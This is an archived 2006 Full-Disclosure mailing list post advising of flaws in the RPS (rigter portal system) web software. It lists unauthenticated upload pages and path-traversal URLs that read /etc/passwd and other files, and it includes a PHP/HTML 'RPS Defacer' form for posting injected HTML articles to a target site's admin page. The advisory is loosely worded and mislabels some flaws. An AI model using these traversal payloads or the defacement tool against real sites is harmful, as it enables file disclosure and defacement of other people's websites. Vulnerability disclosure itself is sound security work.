lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <558f59870607181900s5d850e9eib9ad189bf074688b@mail.gmail.com>
Date: Tue, 18 Jul 2006 21:00:57 -0500
From: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan@...il.com>
To: bugtraq@...urityfocus.com, bugtraq@...e-h.org, admin@...e-h.org, 
	full-disclosure@...ts.grok.org.uk
Cc: 
Subject: Multiple Vulnerabilities RPS

###########################################################################
# Advisory #13 Title: Multiple Vulnerabilities RPS (rigter portal system)
#
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus@...sdelared.com
# Website: www.elitemexico.org
# Date: 18/07/06
# Risk: medium
# Vendor Url: http://rps.rigtersir.com/
# Affected Software: RPS
# Non Affected: RPS V 4
#
#Info:
##################################################################
#UPLOAD FILES
# it allows the user to raise archives without having administration
privileges
#
#
#SQL inyección
#it allows the user to insert post without having to be admin with this can
make xss or
#HTML injection
#
#
#example of upload files
##################################################################
#
#http://www.vuln.com/[path]/adm/photos/images.php
#
#http://www.vuln.com/[path]//adm/down/files.php
#
##################################################################
#example  Remote Execution
##################################################################
#
#http://www.vuln.com/[path]/index.php?id=../../../../../etc/passwd
#
#http://www.vuln.com/[path]/index.php?id=../../../home/victim/public_html/index
#
##################################################################
#
#Solution:
##################################################################
#
#
#VULNERABLE VERSIONS
##################################################################
# v1.0, 2.0 3.0
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus@...sdelared.com
#www.elitemexico.org
##################################################################
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
#
#Original Advisory: http://zeus.pccentervillaflores.com//13.txt
##################################################################

SQL inyección in "Articulos" exploit

<?php
/*
RPS Defacer by: 0o_ZEUS_o0 OliMpusKlaN •~ FX ~•
Date: 08/01/06
Website: www.elitemexico.org
*/
?>
<html>

<head>
<title>RPS Defacer</title>
</head>

<body text="#FFFFFF" bgcolor="#000000">

<p align="center"><font face="Verdana" size="2"><b><u><font
color="#FF0000">RPS Defacer<br>
<br>
</font>
</u><font color="#FF0000">0o_ZEUS_o0 OliMpusKlaN <br /> •~ FX
~•</font></b></font></p>
<form method="POST"  ACTION="?action=enviar" name="rps_defacer">
    <center>
    <table border="0" cellpadding="5" cellspacing="0"
style="border-collapse: collapse" width="40%">
      <tr>
        <td width="100%"><b><font face="Verdana" size="1">Direccion:<br>
        <input type="text" name="url" size="30"
value="http://"></font></b></td>
      </tr>
      <tr>
        <td width="100%"><b><font size="1" face="Verdana">Autor:<br>
        <input type="text" name="autor" size="20"></font></b></td>
      </tr>
      <tr>
        <td width="100%"><b><font face="Verdana"><font size="1">Email:<br>
        <input type="text" name="email" size="20"></font></font></b></td>
      </tr>
      <tr>
        <td width="100%"><b><font size="1" face="Verdana">Titulo:<br>
        <input type="text" name="titulo" size="30"></font></b></td>
      </tr>
      <tr>
        <td width="100%"><b><font size="1" face="Verdana">Contenido:
(Soporta
        HTML Inyection)<br>
        <textarea rows="13" name="articulo"
cols="55"></textarea></font></b></td>
      </tr>
      <tr>
        <td width="100%">
        <p align="center"><b><font face="Verdana" size="1">
        <input type="submit" value="Enviar" name="send">
        <input type="reset" value="Restablecer"
name="delete"></font></b></td>
      </tr>
    </table>
    </center>
  </div>
</form>
<?

if($action=="enviar"){

$web= $_POST['url'];

echo "<script LANGUAGE=\"JavaScript\">

var pagina=\"$web/adm/add_art.php\"
function redireccionar()
{
location.href=pagina
}
setTimeout (\"redireccionar()\", 0001);

</script>";
}
?>

</body>

</html>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ